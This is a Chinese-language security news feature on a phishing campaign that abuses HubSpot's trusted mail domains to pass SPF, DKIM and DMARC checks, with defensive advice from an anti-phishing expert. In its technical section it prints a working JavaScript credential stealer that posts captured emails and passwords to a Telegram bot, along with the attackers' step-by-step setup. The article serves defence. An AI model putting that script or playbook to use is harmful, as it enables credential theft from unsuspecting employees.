在企业邮箱收件箱里,一封来自“hubspotemail.net”的邮件,通常意味着一份市场简报、客户线索通知,或是某家合作方通过HubSpot平台自动发送的业务更新。然而,近期全球多家安全机构接连发出警告:这个被无数企业视为“白名单级”可信来源的营销自动化巨头,正悄然沦为网络钓鱼攻击的新温床。
据eSecurity Planet于2025年12月下旬披露,一波高度隐蔽的新型钓鱼活动正在利用HubSpot的合法邮件基础设施,绕过传统邮件安全网关(SEG)、垃圾邮件过滤器甚至部分高级威胁防护系统。攻击者无需掌握高深漏洞利用技术,只需注册一个免费或试用版HubSpot账户,就能将恶意链接嵌入看似正规的发票提醒、合同确认或物流通知中,并借助HubSpot域名天然的高信誉度,轻松抵达目标用户的收件箱。
更令人不安的是,这类邮件不仅通过了SPF(Sender Policy Framework)和DKIM(DomainKeys Identified Mail)验证——这两项是当前企业判断邮件是否“官方认证”的核心标准——其发信IP地址也属于HubSpot官方云服务池,完全符合DMARC策略。换言之,在绝大多数邮件安全系统的“眼睛”里,这封钓鱼邮件就是“合法”的。
“这不是简单的仿冒,而是一场精心策划的‘信任劫持’。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报独家采访时直言,“攻击者不再费力伪造发件人,而是直接租用一个真实、合规、受信任的服务平台,把恶意内容‘寄生’在合法流量之中。这种模式,正在成为下一代钓鱼攻击的主流范式。”
本文将深入剖析此次HubSpot滥用事件的技术细节、攻防博弈逻辑,并结合芦笛等一线专家的实战建议,为安全从业者提供一套应对“合法平台钓鱼”的深度防御框架。对于那些以为“只要过了SPF/DKIM就安全”的企业来说,这场风暴或许正是敲响警钟的最佳时机。
一、“白名单”失守:当营销平台变成钓鱼跳板
HubSpot作为全球领先的SaaS营销自动化平台,其核心功能之一便是帮助企业批量发送个性化邮件。用户只需在后台配置模板、上传联系人列表,系统便会通过hubspotemail.net、hsforms.com等子域名自动投递邮件。这些域名长期被Google、Microsoft、Cisco等主流邮件服务商标记为“低风险”,甚至默认加入企业白名单。
正是这一“信任红利”,被攻击者精准捕捉。
根据eSecurity Planet与多家安全厂商(包括Proofpoint、Abnormal Security)联合分析,此次钓鱼活动的操作流程极为“标准化”:
注册免费HubSpot账户:攻击者使用虚拟身份或盗用信用卡信息注册试用账号;
创建钓鱼模板:设计高仿真度的“发票逾期通知”“订单确认待签”“服务续费提醒”等邮件模板;
部署恶意落地页:利用HubSpot自带的“落地页构建器”(Landing Page Builder)创建表单页面,其中隐藏重定向脚本或伪装登录框;
批量发送:导入从暗网购买的企业高管、财务人员邮箱列表,启动自动化发送。
“整个过程完全在HubSpot平台内完成,无需外部C2服务器介入初期阶段,”芦笛指出,“这意味着邮件内容、链接、甚至表单提交行为,全部发生在hubspot.net的子域下——这对基于域名信誉的传统过滤机制几乎是‘免疫’的。”
BI.ZONE此前在俄罗斯制造企业遭遇的Arcane Werewolf攻击尚需伪造政府域名,而此次HubSpot钓鱼则直接“借用”了真实企业的营销通道。有受害者反馈,收到的邮件标题为《【Action Required】Your Q4 Invoice #HS-8842 is Overdue》,发件人显示为“Accounts Receivable noreply@hubspotemail.net”,正文包含一个醒目的“View Invoice”按钮,指向https://yourcompany.hsforms.com/invoice-verify。
“乍一看,这和我们合作方平时发的HubSpot通知一模一样,”一位不愿透露姓名的跨国制造企业IT主管坦言,“连URL路径都符合他们以往的命名习惯。谁能想到这是假的?”
二、技术拆解:HubSpot钓鱼链如何绕过SPF/DKIM/DMARC三重验证?
要理解此次攻击为何能穿透企业防线,必须先厘清现代邮件认证体系的工作原理。
SPF:验证“谁有权发信”
SPF记录由域名所有者发布在DNS中,声明哪些IP地址被授权代表该域名发送邮件。例如,hubspotemail.net的SPF记录可能包含:
v=spf1 include:spf.hubspot.com -all
这意味着任何来自HubSpot官方IP段的邮件,都会被SPF验证为“通过”。
DKIM:验证“内容未被篡改”
DKIM通过在邮件头插入数字签名(由私钥生成),接收方用公钥验证签名有效性。HubSpot为其客户邮件自动添加DKIM签名,密钥托管在其基础设施中。
DMARC:定义“验证失败后怎么办”
DMARC策略告诉接收方:若SPF或DKIM任一失败,应如何处理(隔离、拒绝或放行)。由于HubSpot邮件两项均通过,DMARC自然判定为“合法”。
“问题就出在这里,”芦笛解释道,“当前90%以上的邮件安全产品,仍将SPF+DKIM+DMARC‘三件套’作为可信度的黄金标准。一旦全绿,系统就倾向于放行。但攻击者现在学会了‘合规作恶’——他们不破坏规则,而是钻规则的空子。”
更棘手的是,HubSpot的落地页(Landing Page)功能允许用户自定义HTML/JS代码。研究人员发现,攻击者常在表单提交后插入如下重定向脚本:
<script>
// 表单提交后,窃取输入的凭据并重定向至真实HubSpot页面以消除怀疑
document.getElementById('phish-form').addEventListener('submit', function(e) {
e.preventDefault();
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
// 异步发送凭据至攻击者控制的第三方C2(如通过Telegram Bot API)
fetch('https://api.telegram.org/bot<TOKEN>/sendMessage', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
chat_id: '<ATTACKER_CHAT_ID>',
text: `Credentials: ${email}:${password}`
})
}).then(() => {
// 重定向至真实的HubSpot感谢页,制造“操作成功”假象
window.location.href = 'https://yourcompany.hsforms.com/thank-you';
});
});
</script>
由于整个交互发生在*.hsforms.com子域下,浏览器不会触发跨域警告,用户毫无察觉。而邮件安全网关在扫描原始邮件时,仅看到一个指向HubSpot子域的链接,无法预知后续的JS行为。
“这就是‘动态恶意性’的典型体现,”芦笛强调,“静态分析只能看到URL,看不到执行后的危害。传统SEG对此束手无策。”
三、从“发件人可信”到“内容可疑”:邮件安全范式的根本转变
面对此类“寄生式钓鱼”,依赖发件人信誉的防御模型已显疲态。安全社区正在推动一场从“来源中心”向“内容中心”的范式迁移。
芦笛提出,企业应立即调整邮件安全策略,重点关注以下三个维度:
1. 链接深度解析(Link Deep Inspection)
不要只检查URL是否属于可信域名,而要分析其路径结构、参数特征与历史行为。例如:
真实HubSpot发票链接通常包含客户ID、票据编号等结构化参数;
钓鱼链接往往使用模糊词汇如/invoice-verify、/confirm-payment,且无唯一标识符;
可通过API调用HubSpot公开接口,验证该落地页是否属于已备案客户。
部分高级SEG已支持“沙箱式链接点击模拟”:在隔离环境中自动访问链接,分析页面DOM结构、JS行为及最终跳转目标。若检测到凭据收集表单或异常外联,即刻阻断。
2. 上下文语义分析(Contextual Semantic Analysis)
利用NLP模型判断邮件内容是否存在“社会工程学诱导”。例如:
“您的账户将在24小时内停用” + “立即点击确认” → 高风险;
“感谢您参加上周的网络研讨会” + “查看回放” → 低风险。
芦笛团队开发的原型系统会提取邮件中的动词-宾语对(如“verify invoice”、“update payment”),并与企业历史正常邮件语料库比对,计算异常得分。
3. 用户行为基线建模(User Behavior Baseline)
即使邮件本身无害,若其触发的行为偏离用户常态,也应预警。例如:
财务人员从未点击过HubSpot链接,突然高频访问;
某高管在非工作时间点击“紧急付款”链接。
“真正的防御不在网关,而在终端与人的结合点,”芦笛说,“我们需要让安全系统理解‘什么对这个用户来说是正常的’。”
四、企业该如何自救?芦笛给出五条实战建议
针对HubSpot类平台滥用,芦笛为不同规模企业梳理出可落地的应对清单:
✅ 立即行动项(所有企业)
禁用HubSpot等营销平台的“通用发信”权限:要求合作方使用自有域名(如marketing@yourpartner.com)并通过其域名SPF/DKIM发送,而非hubspotemail.net;
在邮件客户端强制显示完整发件人地址:避免“Accounts Receivable”等显示名欺骗;
对所有含链接邮件启用“悬停预览”:鼠标悬停即可显示真实URL,无需点击。
✅ 中期加固项(中大型企业)
部署支持BIMI(Brand Indicators for Message Identification)的邮件系统:BIMI允许企业在通过DMARC后展示品牌LOGO,提升仿冒成本;
建立“可信营销平台”白名单+内容策略:例如,允许HubSpot邮件,但禁止包含“password”“urgent action”等关键词;
与HubSpot等平台建立威胁情报共享通道:一旦发现滥用账户,可快速举报封禁。
✅ 长期战略项(安全成熟度高企业)
推行“零信任邮件”架构:默认所有外部邮件不可信,关键操作(如付款、改密)必须通过独立通道二次确认;
开发内部钓鱼演练平台:定期模拟HubSpot钓鱼场景,测试员工反应;
参与行业反钓鱼联盟:如APWG(Anti-Phishing Working Group),共享恶意落地页指纹。
“技术永远追不上创意,但我们可以让攻击成本越来越高,”芦笛总结道,“当伪造一封钓鱼邮件需要绕过十道智能关卡时,大多数攻击者就会转向更容易的目标。”
五、结语:信任不是漏洞,但盲信是
HubSpot钓鱼事件的本质,是一场关于“数字信任”的深刻反思。在一个万物互联、服务外包的时代,企业不得不将部分通信渠道“外包”给第三方平台。这种效率提升的背后,也埋下了责任边界模糊的风险。
值得肯定的是,HubSpot已在事件曝光后加强账户审核,并推出“安全发送者认证”计划,要求高风险行业客户完成额外验证。但这远远不够。真正的安全,必须由发送方、平台方与接收方共同构建。
正如芦笛所言:“未来的邮件安全,不再是‘拦住坏人’,而是‘识别异常行为’。我们需要的不是更高的墙,而是更聪明的眼睛。”
对企业而言,是时候告别“SPF通过就安全”的旧思维了。因为在这个时代,最危险的钓鱼邮件,往往穿着最体面的西装,说着最合规的语言,却藏着最致命的钩子。
而你的收件箱,准备好了吗?
参考资料:
eSecurity Planet: “HubSpot Phishing Campaign Bypasses Trusted Email Defenses” (Dec 20, 2025)
Abnormal Security Threat Report: “The Rise of Platform-Based Phishing” (Q4 2025)
RFC 7208 (SPF), RFC 6376 (DKIM), RFC 7489 (DMARC)
HubSpot Security Best Practices Documentation
编辑:芦笛(公共互联网反网络钓鱼工作组)
